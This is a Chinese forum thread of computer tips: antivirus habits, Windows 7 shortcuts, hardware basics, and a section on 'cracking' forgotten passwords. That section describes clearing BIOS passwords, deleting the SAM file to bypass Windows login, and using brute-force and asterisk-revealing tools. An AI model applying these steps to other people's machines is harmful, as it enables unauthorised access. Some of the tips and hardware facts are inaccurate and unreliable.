这种做法的道理就是:发作太快或者**性大的恶性病毒会引起特别的关注,从而影响传播;反倒是温和的病毒,传播机会更大一些。根据经验,电脑数据在一两周内被病毒严重**的可能性不大,所以也就出现了上述间歇性杀毒法。
需要提醒一下的是:
即使你开启了再好的防护措施,重要数据的备份也是必要的!
与杀毒软件不同,网络防火墙最好常开。
3.以系统监控手段取代查毒
如果您对自己的电脑水平很有信心,不妨关闭杀毒软件。平时仅经常启用任务管理器、taskinfo之类的系统监控软件查看运行状况,在感到异常时再启动杀毒软件来检查。这种方法免除了杀毒软件的巨大开销。
4.避免同时使用多个杀毒软件
多个杀毒软件同时工作的话,不仅速度慢,系统还可能锁死、崩溃,这与杀毒软件之间争夺系统控制权有关。
流浪●剑尊 - 2010-3-14 19:46:00
计算机中十二种常用密码破解方法
在日常操作中,我们经常要输入各种各样的密码,例如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这些密码,就有可能用不了机器、打不开文件、不能聊天...。
也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码的破解方法,希望能解你燃眉之急!
一、遗忘了SYSTEM密码
如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了,解决的办法只能是:打开机箱,把电池取下、正负极短接,给CMOS放电,清除CMOS中的所有内容(当然也就包括密码),然后重新开机进行设置。
注意:有些主板设置了CMOS密码清除跳线,请参照主板说明书将该跳线短接,这样也可以清除CMOS密码。
二、遗忘了SETUP密码
遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG,然后输入如下命令手工清除SETUP密码:
_o7016
_o7116
_q
你也可以用CMOS密码破解软件来显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARDBELL、PHOENIX、ZENITHAMI等多种BIOS),在DOS下启动该程序,CMOS密码就会显示出来。
三、遗忘了Windows登录密码
WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个人信息文件,重新启动Windows后,系统会弹出一个不包含任何用户名的密码设置框,此时无需输入任何内容,直接单击“确定”,登录密码即被删除。
另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon分支下的UserProfiles修改为“0”,然后重新启动Windows也可达到同样目的。
WinXP/2000下对策:删除系统安装目录system32config下的SAM文件,重新启动,此时管理员Administrator账号已经没有密码了,用Administrator帐户登陆系统,不用输入任何密码,进入系统后再重新设置登陆帐户密码即可。
四、遗忘了Windows屏保密码
解决方法:在开机后按F8键,选择安全模式启动,进入Windows后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕保护,取消“密码保护”即可。
五、遗忘了Windows电源管理密码
Windows的电源管理功能也可以设置密码,启用此功能后,当系统从节能状态返回时就会要求输入密码。
如果你遗忘了该密码,可以使用前面破解Windows登录密码的那种方法去破解。
六、遗忘了微软Office密码
解决方法:使用破解Office系列文档密码的软件,这样的软件有很多,例如AOPR(下载网址
http://www.elcomsoft.com/),该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行搜索。
七、遗忘了WinZip压缩包密码
解决方法:用软件UZPC(UltraZipPasswordCracker,找回丢失的密码。使用该软件时要先设置适当的解密方式,例如“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等,一般采用“BruteForce穷举方式”,然后软件就会对所有可能的密码进行测试,直至找出最后的结果。
八、遗忘了RAR压缩包密码
遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARKRAR压缩包文件名”命令,利用缺省参数即可进行破解。
九、遗忘了QQ/ICQ密码
为保护QQ密码,你应该赶快到这里申请密码保护。假如你忘记了QQ密码、或者密码被盗时,只需填写正确的信息即可取回。
如果你要找回ICQ密码,可以使用软件ICQPasswordRevealer,这是一个DOS下的命令行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久违”的ICQ密码。
十、遗忘了OE密码
如果你忘了密码,无法进入OutLookExpress阅读收到的邮件、使用通讯簿等,可以这样破解:重启计算机并按F8,选择“安全模式”,再启动OE就不需要密码了,然后你可以重建一个用户(不能修改密码),把信息导入新用户信箱即可。
十一、遗忘了Foxmail帐户密码
解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新建一个帐户(帐户名任意,例如如lacl1),然后退出Foxmail;运行Windows资源管理器,找到FoxmailMAILlacl1文件夹,里边有个“account.stg”,把它复制到忘记密码的帐户(例如“lacl”)目录中,直接覆盖原来的“account.stg”文件;再重新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐户中原来的邮件一封都不会少!
十二、查看“*”密码
许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到密码的原始字符,如果你使用专门破解“*”密码的软件,即可查出这些密码的原始字符。
这样的软件有很多,例如Win2000/Win98下你可用iOpusPasswordRecovery,WinXP下可用PasswordSpectatorPro。使用时,只需先打开显示“*”的窗口,启动这类软件,然后按住Ctrl键、在密码栏中按下鼠标左键,这些“*”密码的原始字符就会显示出来了。
流浪●剑尊 - 2010-3-14 19:50:00
===================以上均为我精心挑选的电脑知识帖,希望大家喜欢!~注:本帖会持续更新!~===================
流浪●剑尊 - 2010-3-16 20:13:00
掌握70个功能小技巧 全面搞定Windows7(一)
Windows 7比Vista要好用而且有很多新功能。 不过,由于系统较新, 其中的一些功能并不是很容易被人们所发现,所以我们把其中的一些最重要的技巧和窍门创建成一个列表并且一步一步的向大家进行介绍。
1. PC Safeguard 电脑守卫
我很少让其他人使用我的电脑,因为我怕他们会把它弄的乱七八糟的,但是看起来,微软已经替我考虑到这一点并且顺便解决了这个问题。PC Safeguard不会让任何人把用户电脑的设置弄乱,因为当他们注销的时候,所有的设定都会恢复到正常。当然了,他不会恢复用户自己的设定,但是用户唯一需要做的就是定义好其他用户的权限。
要使用PC Safeguard, 首先 控制面板--用户帐户 接下来创建一个新的帐户,然后选择 "启用PC Safeguard" 然后确定。 然后用户就可以安心的让别人使用用户的电脑了,因为任何东西都不会被改变,包括设定, 下载软件 ,安装程序。
2. 显示校准
很幸运, Windows 7 拥有显示校准向导功能可以让用户适当的调整屏幕的亮度, 所以用户不会在浏览照片和文本时遇到显示问题。之前的Windows上浏览照片时有可能会出现亮度过大等问题。 现在问题解决了, 只要用户按住 WIN+R 然后输入 "DCCW"即可。
3. AppLocker 应用程序锁
对于企业用户或者经常需要与其他人共用一台机器的用户而言,AppLocker无疑是个绝佳的助手。WIN+R运行gpedit.msc打开本地策略组编辑器,计算机配置--windows设置--安全设置--应用程序控制策略, 右键点击其中的一个选项(可执行文件,安装或者脚本)并且新建一个规则即可。
4. 镜像刻录
我们都有过在windows下进行镜像刻录的困扰,因为Windows中并没有内置此功能,我们往往需要安装第三方的软件来解决此问题。但随着Windows 7的到来,这些问题都不复存在了。 我们所有需要做的仅仅是双击 ISO镜像,然后烧录进用户光驱中的CD或者DVD中。
5.播放空白的可移动设备
默认情况下,Windows7对空白的可移动设备是不会进行自动播放的, 此选项可以通过点击 工具--文件夹选项--查看--取消 "隐藏计算机文件夹中的空驱动器"的选择来更改。
6. 把当前窗口停靠在屏幕左侧
这个新功能看起挺有用,因为有些时候,我们会被屏幕中浮着的近乎疯狂的窗口们所困扰,并且很难把他们都弄到一边。 现在我们使用键盘的快捷键就可以很轻松的做到了。 按WIN+左键把它靠到屏幕的左边去吧。
7. 把当前窗口停靠在屏幕右侧
按WIN+右键 可以把窗口靠到右侧
8.显示或隐藏浏览预览面板
按 ALT+P 隐藏或者显示浏览的预览窗口
9.在其他窗口顶端显示小工具
按 ALT+G
10. 幻灯片播放桌面背景图片
如果用户像我一样懒或者无聊,那么用户会去时常的更换用户的桌面背景,这浪费了很多时间。现在用户不需要再这么做了,因为用户可以设置幻灯式播放了。右键单击桌面--个性化设置--桌面背景 并且按住 CTRL的同时选择图片。然后用户可以选择播放图片的时间间隔和选择随机播放还是连续播放。 11. 让任务栏变成Vista样式
如果用户觉得任务栏占用了用户屏幕的太多空间,用户可以选择把图标变小。这样做, 右键单击开始按钮, 选属性--任务栏 选择 "使用小图标"
让Windows 7的任务栏既不合并又不显示窗口标题
12.合并任务栏图标
如果用户打开了很多窗口或者程序, 工具栏的空间可能不够用, 所以用户需要像是XP,vista的那样合并他们。 方法, 右键单击开始按钮, 选属性--任务栏 选择 "在任务栏满时分组"。
13. 多线程文件复制
如果用户是个更高级使用者,用户肯定听说过Robocopy。Windows 7中就内置了此功能,用户可以通过命令行来执行多线程复制。用户可以选择任意数目的线程,就像 "/MT[:n],它的数值范围在1到128之间 。
(在命令行 输入 ROBOCOPY /? 有具体用法)
RoboCopy - 多线程加快Windows 7中文件复制/传输功能
14. 最大化或者恢复前台窗口
按WIN + 上
15. 解锁被进程占用的文件
在Windows中,删除文件时系统提示“正在被另一程序使用”从而无法删除,这样的状况我们经常遇到。这是由于某个后台进程正在调用该文件,此时只有结束该进程才可实现删除。那如何定位该进程呢?通常情况下,我们需要借助诸如“冰刃”等第三方工具。其实,在Windows 7中利用其“资源监视器”可轻松搞定。
详细操作,参见:Windows 7下删除文件提示被占用?系统内置工具搞定
16. 激活快速启动栏
当用户在使用Windows 7时,用户可能会想念那个在XP和VISTA中看起来很有用的快速启动栏。幸运的是,用户可以通过几个很快的步骤把它给找回来。右键单击任务栏--工具栏--新工具栏在空白处输入"%UserProfile%AppData RoamingMicrosoftInternet ExplorerQuick Launch",然后选择文件夹。让他看起来像是在VISTA中一样, 右键工具栏--取消"锁定工具栏", 接着右键点击分离和取消 "显示标题" 和 "显示文本"。 最后右键单击工具栏并且选中"显示小图标" 用户就完成了。
17.在资源管理器中显示预览
在资源管理器窗口 按ALT+P 预览窗口就应该出现在右侧了。
18. 桌面放大镜
按 WIN+ 加号或者减号来进行放大或者缩小。 用户可以缩放桌面上的任何地方,用户还可以配置用户的放大镜。 用户能选择反相颜色,跟随鼠标指针, 跟随键盘焦点或者文本的输入点。
19. 最小化除当前窗口外的所有窗口
按win+Home
20. 电源管理故障排除
Windows 7可以告诉用户的系统用了多少电或者为用户提供关于电源使用以及每个程序和设备的相关问题的详细信息。用户可以使用以下这个方法去优化用户的电池,延长它的使用寿命。 按 WIN+R 输入POWERCFG -ENERGY -OUTPUT PATHFILENAME 一分钟后就会生成一个energy-report.html文件在用户设定的文件夹内。(例如 POWERCFG -ENERGY -output c: 一种后会在C盘根目录下生成energy-report.html 里面有详细的电源描述。)
21. 在用户的桌面上进行网页搜素
Windows 7的桌面搜索则整合了联合搜索的功能以搜索本地计算机之外的东西。现在你可以通过本地计算机搜索网络上的东西。该技术基于OpenSearch和RSS格式。由于其基于的标准是开放性的,用户可以轻松打造自己的个性搜索工具。
Windows 7中的联合搜索功能
22. 在开始菜单中添加视频
如果用户曾寻求一种更快的方式去找到用户的视频,现在Windows 7给了用户一个答案。 右键单击开始--属性--开始菜单--自定义 然后设置视频为 "以链接的形式显示"就完成了。
23. 在不同的显示器之间切换窗口
如果用户同时使用两个或者更多的显示器, 那么用户可能会想把窗口从一个移动到另一个中去。这里有个很简单的方法去实现它。 所有要做的就是 按WIN+SHIFT+左或者右, 这取决于用户想要移动到哪个显示器中去。
24.自定义电源按钮
如果用户很少关闭用户的电脑,但是用户会时常的重启它或者让它睡眠,那么在这里用户有一种选择就是用其他的行为来取代用户的关机按钮。 右键单击开始--属性--电源按钮动作 然后用户就可以在所给的选项中随意的选择了。
25.轻松添加新字体
现在添加一个新的字体要比以前更加容易了。 只需要下载用户所需要的字体, 双击它,用户就会看到安装按钮了。
Windows 7中的字体渲染 - 技术、艺术、设计
26.垂直伸展窗口
用户可以用WIN+SHIFT+上 来最大化垂直伸展用户的当前窗口。 WIN+shift+下来可以恢复它。
27. 打开windows资源浏览器
按WIN+E打开新的windows资源浏览器
28. 创建一个新的任务栏的第一个图标的进程
按WIN+1 可以用来打开一个新的任务栏上第一个图标。 某些情况下非常实用。
29. Action Center行为中心
windows行为中心中会给用户提供用户的电脑的重要信息, 例如杀毒状态,升级,发现故障和提供一个计划备份功能。 控制面板--系统和安全--行为中心
简述Windows 7中的Action Center
30. 自我诊断和修复
这个平台可以帮用户解决很多用户可能会遇到的问题, 比如网络连接,硬件设备,系统变慢等等。用户可以选择用户要诊断的问题,他将同时给用户关于这些问题的一些说明,提醒大家它们真正的给用户提供帮助,这提供很多可行的选项,指导和信息,所以尝试在按win之后输入 "troubleshoot"或者 "fix" 。
31. 关闭系统通知
系统通知通常会打扰用户并且它们经常是没用的,所以用户可能想关闭他们其中的一些。 用户可以在Windows 7中双击控制面板中的通知区域图标来实现它。在这里,用户可以改变行动中心,网络,声音,windows资源浏览器,媒体中心小程序托盘和windows自动升级的通知和图标。
32. 关闭安全信息
要关闭安全信息用户要进入 控制面板--系统和安全--行动中心--改变行动中心设置 然后用户可以关闭一些通知,包括windows升级,网络安全设置,防火墙,间谍软件和相关保护,用户帐户控制,病毒防护,windows备份, windows问题诊断, 查找更新。
33. 循环查看任务栏上打开的程序。
这似乎和ALT+TAB差不多, 但是仅仅是那些打开的在边栏上方的菜单,看起来不是很实用。 可以 按WIN+T 来体验一下。
34. 以管理员身份运行一个程序
当用户打开一个程序的同时按住CTRL+SHIFT 就能以管理员权限去运行它。
35. 切换同一程序的多个实例
如果用户有很多程序正在运行, 只要按住CTRL的同时单击它的图标 ,它就会循环在所有的程序中。
36. 自动排列桌面图标
用户现在可以忘记右键然后点击自动排列这种方式了, 用户只需要按住F5一小会, 图标就会自动排列了。
37. 加密移动USB设备
加密USB设备从来没这么简单过, 现在用户可以右键点击可移动设备然后选择启动BITLOCKER。
38. 关闭智能窗口排列
如果用户不喜欢Windows 7的新功能去智能的排列用户的窗口的话, 这里有个简单的方法去关闭它。 按WIN 输入regedit, 找到 HKEY_CURRENT_USERControl PanelDesktop 然后将WindowArrangementActive的值改成0. 重启之后智能排列窗口就被关闭了。
39.创建系统还原光盘
Windows 7的一个工具可以让用户创建一个可引导的系统修复光盘, 它包括一些系统工具和命令提示符。 按WIN 输入system repair disc 去创建他。
40. 强制移动存储
他仅仅适用于新的电脑和转移文件, 设置和用户帐户。 新的强制移动存储功能占用磁盘空间更小和花费的时间也更少。
42. 改良的计算器
Windows 7的特色之一改良的计算器可以进行单位转换,日期计算,一加仑汽油的里程,租约和按揭的计算。 用户也可以在标准,科学,程序员和统计员模式之间进行选择。
43. 在新进程中打开文件夹
Windows 7的所有的文件夹都在同一个进程中打开,这是为了节省资源,但这并不表示一个文件夹的崩溃会导致全部文件夹的崩溃。所以,如果用户认为这是个没必要的冒险的话,用户可以在把他们在他们各自单独的进程中打开。 按住shift 右键点击驱动器并且选择在新的进程中打开。
44. 问题录制工具
程序安装记录是一个伟大的工具, 它可以被运用在很多环境中。 用户可以通过按 WIN 输入PSR.exe 然后点击记录来启动它。现在它将会记录用户所有的移动,并且储存为HTML格式的文件,用户可以浏览它或者在上面写下用户的描述。这些可以和错误诊断,写入引导或者单独辅导一起给用户提供帮助。
45.Free Codecs Pack 免费解码包
Windows 7内置了.mov和DivX解码器支持。但不幸的是, Windows media player 仍然不能播放一些音频和视频文件, 所以用户仍然需要一些解码器。 但是随着免费解码包的下载, 用户应该不会在这方面有任何问题了。
46. 更改任务栏“库”图标的指向为“计算机”
windows资源浏览器默认在指示库中打开。 我们大部分人用它来取代计算机。 按 WIN
输入 “explorer”,选择属性, 然后在快捷路径中输入“%SystemRoot%explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}”。然后右键单击任务栏上的浏览图标平且点击“从任务栏脱离此图标”然后把它从开始菜单拖拽出来。
47. AeroShake
如果桌面上很多窗口, 用户可以从左到右摇晃窗口来清理桌面,这样所有其他的窗口将会变成最小化。 如果想恢复窗口就再摇晃激活窗口。
48.找回因关闭UAC而无法使用的小工具
也许用户已经注意到了,出于安全考虑一旦UAC被关闭,用户将无法再使用小工具。如果用户想要在UAC被关闭的情况下冒险去使用他们,这里有一种方法。按 WIN 输入 regedit,找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Sidebar Settings 然后新建一个名为AllowElevatedProcess的DWORD值,然后把数值改成1. 现在用户应该可以使用用户的小工具。如果不行,重启电脑吧。
49. 禁用Jumplists
* 右键任务栏 - 属性 - 开始菜单
* 取消勾选“存储并显示最近在开始菜单中打开的程序”和“存储并显示最近在开始菜单和任务栏中打开的项目”
* 确定即可
流浪●剑尊 - 2010-3-16 20:14:00
50. 在用户的电脑上搜索任何东西
Windows 7给用户提供了搜索包括那些用户不知道的在内的所有类型文件的可能性,它会在用户遇到麻烦的时候给用户提供帮助。尽管它不被推荐使用,因为这真的是比普通的搜索要慢很多。 用户可以尝试一下,打开Windows资源管理器,选择工具——文件夹选项——查看选择尝试搜索未知类型文件。如果用户不再需要它的时候别忘把它关了以提高搜素速度。
51. 鼠标手势
Windows 7的手势功能不只可以被那些购买了触摸屏的人所使用,同样可以被鼠标用户所使用。所以,用户可以用按左键向上拖动任务栏图标的方式来取代右键单击的方式来激活跳跃列表。另外,点击并向下拖动IE浏览器中的地址栏会打开浏览历史。大概还有很多手势没有被发现。
52. 配置用户的音乐收藏夹
如果用户已经修复了Windows Media Center,现在用户可以想办法来提高用户在这方面的使用经验了。媒体中心会在用户播放歌曲次数的基础上创建一个音乐收藏列表,用户的播放率和播放时间都会被添加在上面。如果用户不喜欢这种方式的话,用户可以把用户的收藏变的各种样式。 点任务——设置——音乐——音乐收藏。
53. 禁用本地搜索历史
Windows 7默认保留和显示最近的搜索。 这个可能经常会被证明是很刺激的。 不需要紧张,因为用户可以不让他显示。 按WIN 输入 GPEDIT.MSC ,然后 用户设置——管理模版——windows组件——windows资源浏览器 然后双击 关闭显示最近输入的搜索。
54. 高级磁盘整理
Windows 7提供了比VISTA好很多的磁盘整理功能,并且用户可以通过命令行来设置它。 按WIN 输入CMD。用户可以利用输入命令行defrag整理用户的磁盘并且用户还有以下选项: /r 多个同时整理, -a 执行一个整理分析, -v 打印报告, -r 忽略小于64M的碎片, -w 整理所有碎片
例如: “defrag C: -v -w”整理整个C盘。
55. 让IE8运行更快
如果用户让IE8更快,用户要关闭让它变慢的插件。 工具——插件管理 检查每一个插件的加载时间。 用户可以自己选择去掉那些用户不需要的插件以提高读取速度。
56. 媒体中心自动下载
Windows媒体中心12允许用户制定定时下载,所以它会在不打扰用户的情况下就完成了下载。
工具--设置--常规--自动下载选项 然后用户就可以随意的去配置它的下载了。
57.移除侧边栏
Windows 7看起来似乎没有侧边栏这个功能,但是实际上它是存在的并且随着电脑启动而自动被开启并且在后台运行。所以,如果用户想把它摆脱掉,这里有两种方法。比较简单的一种是是按WIN,输入 MSCONFIG.EXE, 点击启动和清除边栏。 难一点的方法就是 按WIN 输入REGEDIT,找到并删除注册表键 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun。这个可以节省用户的被不使用的东西所消耗的内存。
58. 音量自动调整
用户不喜欢Windows 7在检测到电脑内通话的时候自动降低声音的这种功能么? 用户可以关掉它。 右键单击任务栏的音量图标--声音--通信 然后把它关掉。
59. 以其他用户的身份运行程序
Windows 7可以让用户以管理员或者其他用户的身份去运行一个程序,即按住SHIFT的同时右键单击可执行文件或者快捷方式然后用户可以选择以其他用户身份运行。
60. 使用VHD
在Windows 7中,用户先可在用户的真正的磁盘里创建并管理虚拟磁盘文件。可以使用windows的在线安装到用户的虚拟磁盘中而不需要启动虚拟机。创建一个虚拟磁盘用户需要按 Win, 右键单击我的电脑--管理--磁盘管理--操作--创建VHD。 在这里用户可以指定虚拟硬盘的位置和大小。
连接拟硬盘文件 按WIN,右键单击我的电脑, 然后 管理--磁盘管理--操作--连接VHD 然后用户可以指定它的位置和是否是只读。
初始化虚拟硬盘, 按WIN, 右键单击我的电脑, 管理--操作--连接虚拟硬盘。 选择用户想要的分区模式,然后右键点 未分配的空间 并且点击 新简单卷 , 然后跟着指示向导做。 现在,一个新的硬盘诞生了,而且用户可以把它当作真正的分区来使用。
61. 去除任务栏上的Windows Live Messenger
去掉Windows Live Messenger并且把它弄回到那个属于他的系统托盘区。 来到 C:Program FilesWindows LiveMessenger, 右键点msnmsdgr.exe 设置兼容模式为windows vista。
62. 锁定屏幕
Windows 7的开始菜单里不再有锁定按钮,所以现在用户要按WIN+L去锁定它。 这看起来很简单,如果用户不会忘掉这个快捷键的话。
63. 创建新的锁定屏幕快捷方式
如果用户不喜欢使用快键或者把它给忘了,这有另外一种方式可以锁定屏幕。 简单创建一个新的快捷方式到 C:WindowsSystem32rundll32.exe user32.dll。然后用户就可以随意的锁定或者解锁了。
64. 启用开始菜单中的运行
如果用户怀念XP中的运行命令,这里有办法把它在Windows 7中找回来。 右键点击开始菜单的空白处, 属性--开始菜单--自定义 并且找到运行命令。
65. 为NVIDIA显卡改善桌面窗口管理
有的时候桌面的动画效果看起来不是很好而且不够平滑,这是因为桌面窗口的没有使用透明度和模糊来渲染,但是用户可以为更好的显示效果关闭动画。按WIN, 右键单击我的电脑,属性--高级系统设置--性能 --设置 取消"最大化或者最小化时的动画效果", 点确定就行了。
66.改变文件的默认保存位置
Windows 7和Vista有点不同,因为它的文档,图片,视频和音乐都保存在一个公共文件夹下, C:USERS 。用户可能不想把这些文件存放在那,但是创建用户自己想要的储存位置是很简单的。 按WIN,单击用户的用户名并且双击用户想要改变位置的文件夹。之后用户会看到两个库的位置。点击那个TEXT,右键单击用户希望设置成默认的文件夹,然后点"设置为默认文件位置",点OK。
67. Windows Media Player默认为64位
windows 自带版本Windows Media Player默认为32位。 如果用户是64位用户, 这样做,按WIN 输入COMMAMD,右键点Command Prompt然后执行Run as administrator,输入"unregmp2.exe /SwapT64″,之后,按WIN,输入"regedit",来到HKLMSoftwareMicrosoftWindows CurrentVersionApp Pathswmplayer.exe下,双击值并且把它从"%ProgramFiles(x86)"改为"%ProgramFiles%"。现在用户就可以使用64位的Windows Media Player了。
68. 用任务栏打开多个windows资源管理器。
如果用户想用开始条运行更多的WINDOWS资源管理器,用户可以沿着以下步骤来做到:让windows资源管理器脱离任务栏,然后按WIN,找到附件,右键点资源浏览器,属性,把快捷方式路径改为%SystemRoot%explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}(如果用户想把它设置成默认为我的电脑)或者%SystemRoot%explorer.exe /root,::{031E4825-7B94-4dc3-B131-E946B44C8DD5}(如果用户想把它默认为库)。提醒大家现在把资源管理附加回任务栏就可以了。 这样用户只要点鼠标的中键就能打开更多的资源管理器了。 如果用户想改回去, 用户把快捷方式路径改回 %SystemRoot%explorer.exe。
69. 让系统时间托盘显示AM/PM符号
Windows 7默认显示24小时制的时间,所以如果用户想要显示AM/PM,按WIN,输入intl.cpl 去打开
时区和语言选项, 自定义格式,把长时间从HH:mm改成HH:mm tt, 例如tt是AM或者PM符号(21:12 PM)。把它改成12小时制,用户要输入像hh::mm tt(9:12 PM)。
70. IE8兼容模式
如果用户的网站不能正确渲染,用户应该启动IE8兼容视图来播放他们。这是因为升级渲染引擎会导致很多麻烦。 打开 IE, 工具--兼容视图设置 然后选择 用兼容视图打开所有网站, 然后点确定。
无忧葵哥 - 2010-3-16 20:15:00
楼主辛苦!内容很丰富。
西丁宁国 - 2010-3-17 9:20:00
感谢楼主分享,很好的教程啊!向高手老师学习了。
流浪●剑尊 - 2010-3-19 20:47:00
从零开始学电脑,一步一步到高手(一)
流浪●剑尊 - 2010-3-19 20:50:00
CPU:目前常见的CPU主要是由2个厂家生产,一个是AMD
公司的,高端产品是速龙系列,低端是闪龙系列,另外就是INTER公司
,高端产品是奔4系列,低端是赛扬系列.这两年开始流行的双核CPU在2个公司的高端产品中都有相应的型号
CPU的知识比较多,具体的可以再网上查询,这里就不多说了.提醒一句,CPU是造不了假的,只有外盒,风扇等附加品存在假货.
主板:
目前的主板的主芯片都是国外制造的,芯片厂家主要有NVIDIA,ATI,INTER,AMD,VIA,SIS等等,各大主板厂家自己研发PCB板来进行主板的设计,分别来满足2个CPU厂家的CPU需要.
显卡:目前的显卡分为独立和集成显卡,生产独立的显卡芯片主要有2个厂家垄断,NVIDIA
和ATI
公司,生产集成显卡芯片有INTER,NVIDIA,ATI,SIS等等.各大显卡厂家利用显卡芯片提供的显卡GPU来进行显卡的设计和组装.
内存:目前所有内存的颗粒都是国外制造的,主要是韩国制造.国内不过是生产PCB板和封装的过程.内存主要有3种,一种是SD内存(已淘汰),一种是DDR内存
,一种是DDR II代内存
.未来还有DDR III代内存.
硬盘:常见的硬盘有三星,西数和希捷,基本上是希捷一枝独秀,容量在20GB以上的基本上都是7400转的,低于20GB的一般都是5400转的,转速越高,硬盘读些数据的速度越快.提醒一句:
硬盘的生产环境要求比较高,所有的硬盘都是国外生产. 
机箱+电源:这两样东西没有什么技术含量,都是国内制造.
光驱:常见的有CD-ROM(类似VCD机),CD刻录机(兼容VCD,可以刻录VCD),DVD光驱(类似DVD机,兼容VCD),康宝(相当于DVD光驱多了个刻录VCD光盘的功能),DVD刻录机(VCD,DVD播放和VCD,DVD刻录功能)
显示器:常见的有两种类型,CRT
和LCD
,一种是普通显示器,一种是液晶显示器,普通显示器常见的发展过程和电视机相似,尺寸从14 15 17 19 21,屏幕从球面超平视觉纯平物理纯平.液晶显示器尺寸从14 15 17 19寸,目前流行的宽屏有17 19 20 21寸等等.LCD显示器的液晶面板都是国外制造的.
声卡:常见的有集成声卡和独立声卡,绝大多数的主板都集成的有集成声卡,可以满足普通消费者的是使用.独立声卡一般应用于高端,这里就不多说了.
网卡:常见的有独立和集成网卡,绝大多数的主板都集成有集成网卡,可以满足普通消费者的使用,独立网卡主要应用于特殊要求的用户.这里不多说了.
键盘+鼠标:相对没有什么技术含量,属于损耗品.跟个人喜好有关系
音箱+耳麦:相对没有什么技术含量,属于损耗品.跟个人喜好有关系.
软驱:基本上已经淘汰,这里就不讨论了.
综述::
主板就是个平台,把CPU,内存,显卡,硬盘,光驱通过数据线或者直接安装来组成一个工作整体.CPU相当于人的大脑,发出各种指令来协调各个部分的工作,内存是个中转仓库,中转各种指令,数据等等.关机后数据不保留,硬盘是最终载体,所有的数据,程序,歌曲,电影等等都是保存在硬盘中,硬盘中的数据在关机后保留.机箱就是把这个整体固定在一个固定的环境中,通过电源来给各个部分来进行供电,通过显卡来输出显示信号,最后在显示在显示器上.键盘鼠标来进行电脑的各项操作.音箱通过主板上的集成声卡来输出各种声音.网卡是组建局域网或者上网的时候发送和接收数据. 电脑的硬件说白了就是能摸的到的都是硬件,摸不到的就属于软件.电脑硬件一般情况下是不容易损坏的,只有软件方面的问题比较多,只有把软件方面的故障全部排除后最后才考虑硬件方面的问题.
流浪●剑尊 - 2010-3-19 20:53:00
软件篇
1.
分区和格式化过程:在电脑硬件全部组装好的情况下,首先要先把硬盘来进行分区,说白了就是把硬盘分成几块,类似于打地基过程,分区相当于分成几间屋子,格式化相当于平整地面的过程.分区的软件比较多,常见的有FDISK,DM,PQ等等,区别在于FDISK分区后还要用FORMAT来进行格式化,速度比较慢,主要应用于硬盘容量比较小.而DM和PQ可以在一个软件中通行进行分区和格式化的过程,速度比较快.分区格式通常有2种,一种FAT32,一种是NTFS,FDISK和DM都只能分成FAT32格式的,PQ可以分成两种格式的,两种分区格式的区别是:FAT32格式比较老,主要应用于WIN98,WIN2000,WINME,WINXP等等,但是比较容易产生磁盘碎片,在DOS环境中可以访问.NTFS格式主要应用于WIN2000和WINXP,包括以后未来的操作系统,不兼容WIN98操作系统,不容易产生磁盘碎片,在DOS环境中不可以直接访问.系统中的安全性也比较高.
2.
安装操作系统:现在开始就接触到硬盘安装的第一个软件了,操作系统也是软件,目前的所有常见的软件,电影,歌曲,游戏等等都是要在这个操作系统的环境中才可以进行播放和运行.操作系统主要是WINDOWS操作系统系列,操作系统有WIN95 ,WIN98,WINME,WIN2000,WINXP,WIN2003等等,WIN95,WINME和WIN98现在基本已经淘汰就不说了,WIN2000主要又细分了3个版本:专业版,服务器版,高级服务器版.WINXP分为2个版本:专业版和家庭版.WIN2003分为服务器和高级服务器版本.目前普通用户安装的都是专业版XP. WINXP操作系统在安装的过程中也可以进行分区和格式化,所以用WINXP操作系统的可以不用看第一部分.操作系统的安装方式主要有2种,一种是光盘安装版,缺点是时间比较长,优点是稳定性比较高.一种是GHOST版本,优点是速度快,并且某些GHOST版本的XP在系统安装完毕后还附带了好多常用软件等等.缺点是稳定性没有正常安装版的高.一般电脑城装机或者电脑售后服务都是采取这种GHOST的安装方式来进行操作系统的安装.
3.
驱动程序的安装:安装完操作系统以后,就可以进入漂亮的WINDOW界面了,但是这个时候还没有安装驱动程序,所以好多功能还不能正常使用.例如声卡没有驱动就不能播放声音,网卡没有驱动就不能上网等等.只有安装好驱动程序以后,操作系统才可以正常识别出硬件并发挥出各个部件的功能.提醒:如果采取GHOST方式安装的操作系统一般可以省略安装驱动程序这一步骤,前面说过,GHOST方式安装的操作系统不但集成了常见的驱动,而且还集成了常用软件,所以安装操作系统的时间可以大大缩短.一般驱动程序在你购买主机的时候都附带的有光盘,那个光盘就是驱动程序盘,当然也可以从网上下载,一般情况下根据你的主板,显卡的型号到相对应的厂家的官方网站上去下载.
4.
